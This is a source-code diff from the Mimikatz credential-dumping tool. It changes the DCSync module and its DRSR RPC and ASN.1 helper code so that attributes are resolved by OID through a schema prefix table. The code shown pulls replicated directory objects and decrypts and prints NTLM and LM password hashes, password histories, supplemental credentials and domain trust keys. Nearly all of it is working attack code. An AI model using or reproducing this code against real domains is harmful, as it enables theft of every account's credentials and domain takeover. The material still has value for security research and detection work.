void kuhl_m_lsadump_dcsync_findPrintMonoAttr(LPCWSTR prefix, ATTRBLOCK *attributes, ATTRTYP type, BOOL newLine)
{
PVOID ptr;
DWORD sz;
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, type, &ptr, &sz))
kprintf(L"%s%.*s%s", prefix ? prefix : L"", sz / sizeof(wchar_t), (PWSTR) ptr, newLine ? L"\n" : L"");
}
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
{
DWORD i;
@ -1828,14 +1809,14 @@ BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWO
return status;
}
void kuhl_m_lsadump_dcsync_descrObject(ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
{
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"\nObject RDN : ", attributes, ATT_RDN, TRUE);
kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
kprintf(L"\n");
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SAM_ACCOUNT_NAME, NULL, NULL))
kuhl_m_lsadump_dcsync_descrUser(attributes);
else if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_TRUST_PARTNER, NULL, NULL))
kuhl_m_lsadump_dcsync_descrTrust(attributes, szSrcDomain);
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
kuhl_m_lsadump_dcsync_descrTrust(prefixTable, attributes, szSrcDomain);
}
const wchar_t * KUHL_M_LSADUMP_UF_FLAG[] = {
@ -1886,21 +1867,22 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
return target;
}
void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes)
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
{
DWORD rid = 0, i;
PBYTE encodedData;
DWORD encodedDataSize;
PVOID data;
ATTRVALBLOCK *sids;
kprintf(L"** SAM ACCOUNT **\n\n");
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"SAM Username : ", attributes, ATT_SAM_ACCOUNT_NAME, TRUE);
kuhl_m_lsadump_dcsync_findPrintMonoAttr(L"User Principal Name : ", attributes, ATT_USER_PRINCIPAL_NAME, TRUE);
kull_m_rpc_drsr_findPrintMonoAttr(L"SAM Username : ", prefixTable, attributes, szOID_ANSI_sAMAccountName, TRUE);
kull_m_rpc_drsr_findPrintMonoAttr(L"User Principal Name : ", prefixTable, attributes, szOID_ANSI_userPrincipalName, TRUE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SAM_ACCOUNT_TYPE, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountType, &data, NULL))
kprintf(L"Account Type : %08x ( %s )\n", *(PDWORD) data, kuhl_m_lsadump_samAccountType_toString(*(PDWORD) data));
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_USER_ACCOUNT_CONTROL, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_userAccountControl, &data, NULL))
{
kprintf(L"User Account Control : %08x ( ", *(PDWORD) data);
for(i = 0; i < min(ARRAYSIZE(KUHL_M_LSADUMP_UF_FLAG), sizeof(DWORD) * 8); i++)
@ -1909,21 +1891,32 @@ void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes)
kprintf(L")\n");
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_ACCOUNT_EXPIRES, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_accountExpires, &data, NULL))
{
kprintf(L"Account expiration : ");
kull_m_string_displayLocalFileTime((LPFILETIME) data);
kprintf(L"\n");
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_PWD_LAST_SET, &data, NULL))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_pwdLastSet, &data, NULL))
{
kprintf(L"Password last change : ");
kull_m_string_displayLocalFileTime((LPFILETIME) data);
kprintf(L"\n");
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_OBJECT_SID, &data, NULL))
if(sids = kull_m_rpc_drsr_findAttr(prefixTable, attributes, szOID_ANSI_sIDHistory))
{
kprintf(L"SID history:\n");
for(i = 0; i < sids->valCount; i++)
{
kprintf(L" ");
kull_m_string_displaySID(sids->pAVal[i].pVal);
kprintf(L"\n");
}
}
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_objectSid, &data, NULL))
{
kprintf(L"Object Security ID : ");
kull_m_string_displaySID(data);
@ -1932,17 +1925,17 @@ void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes)
kprintf(L"Object Relative ID : %u\n", rid);
kprintf(L"\nCredentials:\n");
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_UNICODE_PWD, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_unicodePwd, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"NTLM", FALSE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_NT_PWD_HISTORY, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_ntPwdHistory, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"ntlm", TRUE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_DBCS_PWD, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_dBCSPwd, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"LM ", FALSE);
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_LM_PWD_HISTORY, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_lmPwdHistory, &encodedData, &encodedDataSize))
kuhl_m_lsadump_dcsync_decrypt(encodedData, encodedDataSize, rid, L"lm ", TRUE);
}
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_SUPPLEMENTAL_CREDENTIALS, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_supplementalCredentials, &encodedData, &encodedDataSize))
{
kprintf(L"\nSupplemental Credentials:\n");
kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
@ -2036,7 +2029,7 @@ void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties)
}
}
void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain)
{
PBYTE encodedData;
DWORD encodedDataSize;
@ -2044,7 +2037,7 @@ void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain
kprintf(L"** TRUSTED DOMAIN - Antisocial **\n\n");
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_TRUST_PARTNER, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, &encodedData, &encodedDataSize))
{
uPartner.Length = uPartner.MaximumLength = (USHORT) encodedDataSize;
uPartner.Buffer = (PWSTR) encodedData;
@ -2054,8 +2047,8 @@ void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain
RtlInitUnicodeString(&uDomain, szSrcDomain);
if(NT_SUCCESS(RtlUpcaseUnicodeString(&uUpcaseDomain, &uDomain, TRUE)))
{
kuhl_m_lsadump_dcsync_descrTrustAuthentication(attributes, ATT_TRUST_AUTH_INCOMING, &uUpcaseDomain, &uUpcasePartner);
kuhl_m_lsadump_dcsync_descrTrustAuthentication(attributes, ATT_TRUST_AUTH_OUTGOING, &uUpcaseDomain, &uUpcasePartner);
kuhl_m_lsadump_dcsync_descrTrustAuthentication(prefixTable, attributes, &uUpcaseDomain, &uUpcasePartner, TRUE);
kuhl_m_lsadump_dcsync_descrTrustAuthentication(prefixTable, attributes, &uUpcaseDomain, &uUpcasePartner, FALSE);
RtlFreeUnicodeString(&uUpcaseDomain);
}
RtlFreeUnicodeString(&uUpcasePartner);
@ -2063,7 +2056,7 @@ void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain
}
}
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(ATTRBLOCK *attributes, ATTRTYP type, PCUNICODE_STRING domain, PCUNICODE_STRING partner)
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn)
{
PBYTE encodedData;
DWORD encodedDataSize;
@ -2071,9 +2064,9 @@ void kuhl_m_lsadump_dcsync_descrTrustAuthentication(ATTRBLOCK *attributes, ATTRT
LPCWSTR prefix, prefixOld;
PCUNICODE_STRING from, dest;
if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, type, &encodedData, &encodedDataSize))
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, isIn ? szOID_ANSI_trustAuthIncoming : szOID_ANSI_trustAuthOutgoing, &encodedData, &encodedDataSize))
{
if(type == ATT_TRUST_AUTH_INCOMING)
if(isIn)
{
prefix = L" In ";
prefixOld = L" In-1";

11
mimikatz/modules/kuhl_m_lsadump.h
View File

@ -420,15 +420,12 @@ PKERB_KEY_DATA kuhl_m_lsadump_lsa_keyDataInfo(PVOID base, PKERB_KEY_DATA keys, U
PKERB_KEY_DATA_NEW kuhl_m_lsadump_lsa_keyDataNewInfo(PVOID base, PKERB_KEY_DATA_NEW keys, USHORT Count, PCWSTR title);
void kuhl_m_lsadump_lsa_DescrBuffer(DWORD type, PVOID Buffer, DWORD BufferSize);
PVOID kuhl_m_lsadump_dcsync_findMonoAttr(ATTRBLOCK *attributes, ATTRTYP type, PVOID data, DWORD *size);
void kuhl_m_lsadump_dcsync_findPrintMonoAttr(LPCWSTR prefix, ATTRBLOCK *attributes, ATTRTYP type, BOOL newLine);
BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
void kuhl_m_lsadump_dcsync_descrObject(ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes);
void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
void kuhl_m_lsadump_dcsync_descrTrust(ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(ATTRBLOCK *attributes, ATTRTYP type, PCUNICODE_STRING domain, PCUNICODE_STRING partner);
void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);
typedef wchar_t * LOGONSRV_HANDLE;
typedef struct _NETLOGON_CREDENTIAL {

90
modules/kull_m_asn1.c
View File

@ -5,6 +5,10 @@
*/
#include "kull_m_asn1.h"
ASN1module_t hASN1Module = NULL;
ASN1encoding_t ASN1enc = NULL;
ASN1decoding_t ASN1dec = NULL;
void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data)
{
BYTE flagBuffer[5] = {0};
@ -29,4 +33,90 @@ void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String)
ber_printf(pBer, "to", DIRTY_ASN1_ID_GENERAL_STRING, aString.Buffer, aString.Length);
RtlFreeAnsiString(&aString);
}
}
static const ASN1GenericFun_t kull_m_asn1_encdecfreefntab[] = {NULL};
static const ASN1uint32_t kull_m_asn1_sizetab[] = {0};
BOOL kull_m_asn1_init()
{
BOOL status = FALSE;
int ret;
if(hASN1Module = ASN1_CreateModule(ASN1_THIS_VERSION, ASN1_BER_RULE_DER, ASN1FLAGS_NOASSERT, 1, kull_m_asn1_encdecfreefntab, kull_m_asn1_encdecfreefntab, (const ASN1FreeFun_t *) kull_m_asn1_encdecfreefntab, kull_m_asn1_sizetab, 'iwik'))
{
ret = ASN1_CreateEncoder(hASN1Module, &ASN1enc, NULL, 0, NULL);
if(ASN1_FAILED(ret))
{
PRINT_ERROR(L"ASN1_CreateEncoder: %i\n", ret);
ASN1enc = NULL;
}
else
{
ret = ASN1_CreateDecoder(hASN1Module, &ASN1dec, NULL, 0, NULL);
if(ASN1_FAILED(ret))
{
PRINT_ERROR(L"ASN1_CreateDecoder: %i\n", ret);
ASN1dec = NULL;
}
}
}
else PRINT_ERROR(L"ASN1_CreateModule\n");
status = hASN1Module && ASN1enc && ASN1dec;
if(!status)
kull_m_asn1_term();
return status;
}
void kull_m_asn1_term()
{
if(ASN1dec)
{
ASN1_CloseDecoder(ASN1dec);
ASN1dec = NULL;
}
if(ASN1enc)
{
ASN1_CloseEncoder(ASN1enc);
ASN1enc = NULL;
}
if(hASN1Module)
{
ASN1_CloseModule(hASN1Module);
hASN1Module = NULL;
}
}
BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID)
{
BOOL status = FALSE;
if(ASN1enc && dotOID && encodedOID)
{
encodedOID->length = 0;
encodedOID->value = NULL;
status = ASN1BERDotVal2Eoid(ASN1enc, dotOID, encodedOID);
}
return status;
}
void kull_m_asn1_freeEnc(void *pBuf)
{
if(ASN1enc && pBuf)
ASN1_FreeEncoded(ASN1enc, pBuf);
}
BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID)
{
BOOL status = FALSE;
if(ASN1dec && encodedOID && dotOID)
{
*dotOID = NULL;
status = ASN1BEREoid2DotVal(ASN1dec, encodedOID, dotOID);
}
return status;
}
void kull_m_asn1_freeDec(void *pBuf)
{
if(pBuf)
ASN1Free(pBuf);
}

18
modules/kull_m_asn1.h
View File

@ -7,6 +7,7 @@
#include "globals.h"
#include <Winldap.h>
#include <Winber.h>
#include <msasn1.h>
#include "kull_m_string.h"
#define DIRTY_ASN1_ID_BOOLEAN 0x01
@ -27,4 +28,19 @@
void kull_m_asn1_BitStringFromULONG(BerElement * pBer, ULONG data);
void kull_m_asn1_GenTime(BerElement * pBer, PFILETIME localtime);
void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String);
void kull_m_asn1_GenString(BerElement * pBer, PCUNICODE_STRING String);
typedef struct {
unsigned short length;
unsigned char *value;
} OssEncodedOID;
extern ASN1_PUBLIC BOOL ASN1API ASN1BERDotVal2Eoid(__in ASN1encoding_t pEncoderInfo, __in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID);
extern ASN1_PUBLIC BOOL ASN1API ASN1BEREoid2DotVal(__in ASN1decoding_t pDecoderInfo, __in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID);
BOOL kull_m_asn1_init();
void kull_m_asn1_term();
BOOL kull_m_asn1_DotVal2Eoid(__in const ASN1char_t *dotOID, __out OssEncodedOID *encodedOID);
void kull_m_asn1_freeEnc(void *pBuf);
BOOL kull_m_asn1_Eoid2DotVal(__in const OssEncodedOID *encodedOID, __out ASN1char_t **dotOID);
void kull_m_asn1_freeDec(void *pBuf);

232
modules/rpc/kull_m_rpc_drsr.c
View File

@ -185,10 +185,26 @@ BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWS
return status;
}
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects) // very partial, ofc
LPCSTR kull_m_rpc_drsr_encrypted_oids[] = {
szOID_ANSI_unicodePwd, szOID_ANSI_ntPwdHistory, szOID_ANSI_dBCSPwd, szOID_ANSI_lmPwdHistory, szOID_ANSI_supplementalCredentials,
szOID_ANSI_trustAuthIncoming, szOID_ANSI_trustAuthOutgoing,
szOID_ANSI_currentValue,
};
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(SCHEMA_PREFIX_TABLE *prefixTable, REPLENTINFLIST *objects) // very partial, ofc
{
ATTRTYP attSensitive[ARRAYSIZE(kull_m_rpc_drsr_encrypted_oids)];
REPLENTINFLIST * pReplentinflist, *pNextReplentinflist = objects;
DWORD i, j;
DWORD i, j, k;
for(i = 0; i < ARRAYSIZE(attSensitive); i++)
{
if(!kull_m_rpc_drsr_MakeAttid(prefixTable, kull_m_rpc_drsr_encrypted_oids[i], &attSensitive[i], FALSE))
{
PRINT_ERROR(L"Unable to MakeAttid for %S\n", kull_m_rpc_drsr_encrypted_oids[i]);
return FALSE;
}
}
while(pReplentinflist = pNextReplentinflist)
{
pNextReplentinflist = pReplentinflist->pNextEntInf;
@ -196,26 +212,17 @@ BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects) // very p
{
for(i = 0; i < pReplentinflist->Entinf.AttrBlock.attrCount; i++)
{
switch(pReplentinflist->Entinf.AttrBlock.pAttr[i].attrTyp)
for(j = 0; j < ARRAYSIZE(attSensitive); j++)
{
case ATT_CURRENT_VALUE:
case ATT_UNICODE_PWD:
case ATT_NT_PWD_HISTORY:
case ATT_DBCS_PWD:
case ATT_LM_PWD_HISTORY:
case ATT_SUPPLEMENTAL_CREDENTIALS:
case ATT_TRUST_AUTH_INCOMING:
case ATT_TRUST_AUTH_OUTGOING:
// case another :
// case another :
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
for(j = 0; j < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; j++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j].pVal)
if(!kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(&pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[j]))
if(attSensitive[j] == pReplentinflist->Entinf.AttrBlock.pAttr[i].attrTyp)
{
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal)
for(k = 0; k < pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.valCount; k++)
if(pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[k].pVal)
if(!kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(&pReplentinflist->Entinf.AttrBlock.pAttr[i].AttrVal.pAVal[k]))
return FALSE;
break;
default:
break;
break;
}
}
}
}
@ -356,13 +363,7 @@ void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_G
MIDL_user_free(reply->V6.pNC);
if(reply->V6.pUpToDateVecSrc)
MIDL_user_free(reply->V6.pUpToDateVecSrc);
if(reply->V6.PrefixTableSrc.pPrefixEntry)
{
for(i = 0; i < reply->V6.PrefixTableSrc.PrefixCount; i++)
if(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements)
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry[i].prefix.elements);
MIDL_user_free(reply->V6.PrefixTableSrc.pPrefixEntry);
}
kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(&reply->V6.PrefixTableSrc);
pNextReplentinflist = reply->V6.pObjects;
while(pReplentinflist = pNextReplentinflist)
{
@ -412,4 +413,181 @@ void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_G
break;
}
}
}
void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTable)
{
DWORD i;
if(prefixTable)
{
if(prefixTable->pPrefixEntry)
{
for(i = 0; i < prefixTable->PrefixCount; i++)
if(prefixTable->pPrefixEntry[i].prefix.elements)
MIDL_user_free(prefixTable->pPrefixEntry[i].prefix.elements);
MIDL_user_free(prefixTable->pPrefixEntry);
}
}
}
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type)
{
LPSTR szOid = NULL;
DWORD i;
USHORT low = (USHORT) type, idx = (USHORT) (type >> 16);
OID_t *pLittleOid = NULL;
OssEncodedOID encodedOid;
for(i = 0; i < prefixTable->PrefixCount; i++)
{
if(prefixTable->pPrefixEntry[i].ndx == idx)
{
pLittleOid = &prefixTable->pPrefixEntry[i].prefix;
break;
}
}
if(pLittleOid)
{
encodedOid.length = (USHORT) (pLittleOid->length + ((low < 0x80) ? 1 : 2));
if(encodedOid.value = (PBYTE) LocalAlloc(LPTR, encodedOid.length))
{
RtlCopyMemory(encodedOid.value, pLittleOid->elements, pLittleOid->length);
if(low < 0x80)
encodedOid.value[pLittleOid->length] = (BYTE) low;
else
{
if(low >= 0x8000)
low -= 0x8000;
encodedOid.value[pLittleOid->length] = (BYTE) (((low / 0x80) % 0x80) + 0x80);
encodedOid.value[pLittleOid->length + 1] = (BYTE) (low % 0x80);
}
if(!kull_m_asn1_Eoid2DotVal(&encodedOid, &szOid))
szOid = NULL;
LocalFree(encodedOid.value);
}
}
return szOid;
}
DWORD kull_m_rpc_drsr_MakeAttid_addPrefixToTable(SCHEMA_PREFIX_TABLE *prefixTable, OssEncodedOID *oidPrefix, DWORD *ndx, BOOL toAdd)
{
BOOL status = FALSE;
DWORD i;
PrefixTableEntry *entries;
for(i = 0; i < prefixTable->PrefixCount; i++)
{
if(prefixTable->pPrefixEntry[i].prefix.length == oidPrefix->length)
{
if(RtlEqualMemory(prefixTable->pPrefixEntry[i].prefix.elements, oidPrefix->value, oidPrefix->length))
{
status = TRUE;
*ndx = prefixTable->pPrefixEntry[i].ndx;
break;
}
}
}
if(!status && toAdd)
{
*ndx = prefixTable->PrefixCount;
if(entries = (PrefixTableEntry *) MIDL_user_allocate(sizeof(PrefixTableEntry) * ((*ndx) + 1)))
{
RtlCopyMemory(entries, prefixTable->pPrefixEntry, sizeof(PrefixTableEntry) * (*ndx));
entries[*ndx].ndx = *ndx;
entries[*ndx].prefix.length = oidPrefix->length;
if(entries[*ndx].prefix.elements = (PBYTE) MIDL_user_allocate(oidPrefix->length))
{
RtlCopyMemory(entries[*ndx].prefix.elements, oidPrefix->value, oidPrefix->length);
if(prefixTable->pPrefixEntry)
MIDL_user_free(prefixTable->pPrefixEntry);
prefixTable->pPrefixEntry = entries;
prefixTable->PrefixCount++;
status = TRUE;
}
}
}
return status;
}
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd)
{
BOOL status = FALSE;
DWORD lastValue, ndx;
PSTR lastValueString;
OssEncodedOID oidPrefix;
if(lastValueString = strrchr(szOid, '.'))
{
if(*(lastValueString + 1))
{
lastValueString++;
lastValue = strtoul(lastValueString, NULL, 0);
*att = (WORD) lastValue % 0x4000;
if(*att >= 0x4000)
*att += 0x8000;
if(kull_m_asn1_DotVal2Eoid(szOid, &oidPrefix))
{
oidPrefix.length -= (lastValue < 0x80) ? 1 : 2;
if(status = kull_m_rpc_drsr_MakeAttid_addPrefixToTable(prefixTable, &oidPrefix, &ndx, toAdd))
*att |= ndx << 16;
else PRINT_ERROR(L"kull_m_rpc_drsr_MakeAttid_addPrefixToTable");
kull_m_asn1_freeEnc(oidPrefix.value);
}
}
}
return status;
}
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid)
{
ATTRVALBLOCK *ptr = NULL;
DWORD i;
ATTR *attribut;
ATTRTYP type;
if(kull_m_rpc_drsr_MakeAttid(prefixTable, szOid, &type, FALSE))
{
for(i = 0; i < attributes->attrCount; i++)
{
attribut = &attributes->pAttr[i];
if(attribut->attrTyp == type)
{
ptr = &attribut->AttrVal;
break;
}
}
}
else PRINT_ERROR(L"Unable to get an ATTRTYP for %S\n", szOid);
return ptr;
}
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size)
{
PVOID ptr = NULL;
ATTRVALBLOCK *valblock;
if(data)
*(PVOID *)data = NULL;
if(size)
*size = 0;
if(valblock = kull_m_rpc_drsr_findAttr(prefixTable, attributes, szOid))
{
if(valblock->valCount == 1)
{
ptr = valblock->pAVal[0].pVal;
if(data)
*(PVOID *)data = ptr;
if(size)
*size = valblock->pAVal[0].valLen;
}
}
return ptr;
}
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine)
{
PVOID ptr;
DWORD sz;
if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOid, &ptr, &sz))
kprintf(L"%s%.*s%s", prefix ? prefix : L"", sz / sizeof(wchar_t), (PWSTR) ptr, newLine ? L"\n" : L"");
}

98
modules/rpc/kull_m_rpc_drsr.h
View File

@ -7,6 +7,7 @@
#include "../kull_m_crypto_system.h"
#include "../kull_m_crypto.h"
#include "../kull_m_string.h"
#include "../kull_m_asn1.h"
#include "kull_m_rpc_ms-drsr.h"
typedef struct _DRS_EXTENSIONS_INT {
@ -105,6 +106,10 @@ typedef struct _ENCRYPTED_PAYLOAD {
#define DRS_SYNC_PAS 0x40000000
#define DRS_GET_ALL_GROUP_MEMBERSHIP 0x80000000
#define ENTINF_FROM_MASTER 0x00000001
#define ENTINF_DYNAMIC_OBJECT 0x00000002
#define ENTINF_REMOTE_MODIFY 0x00010000
typedef enum {
DS_UNKNOWN_NAME = 0,
DS_FQDN_1779_NAME = 1,
@ -158,48 +163,79 @@ typedef enum {
EXOP_REPL_SECRETS = 7
} EXOP_REQ;
#define ATT_RDN 589825
#define ATT_OBJECT_SID 589970
#define ATT_WHEN_CREATED 131074
#define ATT_WHEN_CHANGED 131075
#define szOID_ANSI_name "1.2.840.113556.1.4.1"
#define ATT_SAM_ACCOUNT_NAME 590045
#define ATT_USER_PRINCIPAL_NAME 590480
#define ATT_SERVICE_PRINCIPAL_NAME 590595
#define ATT_SID_HISTORY 590433
#define ATT_USER_ACCOUNT_CONTROL 589832
#define ATT_SAM_ACCOUNT_TYPE 590126
#define ATT_LOGON_HOURS 589888
#define ATT_LOGON_WORKSTATION 589889
#define ATT_LAST_LOGON 589876
#define ATT_PWD_LAST_SET 589920
#define ATT_ACCOUNT_EXPIRES 589983
#define ATT_LOCKOUT_TIME 590486
#define szOID_ANSI_sAMAccountName "1.2.840.113556.1.4.221"
#define szOID_ANSI_userPrincipalName "1.2.840.113556.1.4.656"
#define szOID_ANSI_servicePrincipalName "1.2.840.113556.1.4.771"
#define szOID_ANSI_sAMAccountType "1.2.840.113556.1.4.302"
#define szOID_ANSI_userAccountControl "1.2.840.113556.1.4.8"
#define szOID_ANSI_accountExpires "1.2.840.113556.1.4.159"
#define szOID_ANSI_pwdLastSet "1.2.840.113556.1.4.96"
#define szOID_ANSI_objectSid "1.2.840.113556.1.4.146"
#define szOID_ANSI_sIDHistory "1.2.840.113556.1.4.609"
#define szOID_ANSI_unicodePwd "1.2.840.113556.1.4.90"
#define szOID_ANSI_ntPwdHistory "1.2.840.113556.1.4.94"
#define szOID_ANSI_dBCSPwd "1.2.840.113556.1.4.55"
#define szOID_ANSI_lmPwdHistory "1.2.840.113556.1.4.160"
#define szOID_ANSI_supplementalCredentials "1.2.840.113556.1.4.125"
#define ATT_UNICODE_PWD 589914
#define ATT_NT_PWD_HISTORY 589918
#define ATT_DBCS_PWD 589879
#define ATT_LM_PWD_HISTORY 589984
#define ATT_SUPPLEMENTAL_CREDENTIALS 589949
#define szOID_ANSI_trustPartner "1.2.840.113556.1.4.133"
#define szOID_ANSI_trustAuthIncoming "1.2.840.113556.1.4.129"
#define szOID_ANSI_trustAuthOutgoing "1.2.840.113556.1.4.135"
#define ATT_CURRENT_VALUE 589851
#define szOID_ANSI_currentValue "1.2.840.113556.1.4.27"
#define ATT_TRUST_ATTRIBUTES 590294
#define ATT_TRUST_AUTH_INCOMING 589953
#define ATT_TRUST_AUTH_OUTGOING 589959
#define ATT_TRUST_DIRECTION 589956
#define ATT_TRUST_PARENT 590295
#define ATT_TRUST_PARTNER 589957
#define ATT_TRUST_TYPE 589960
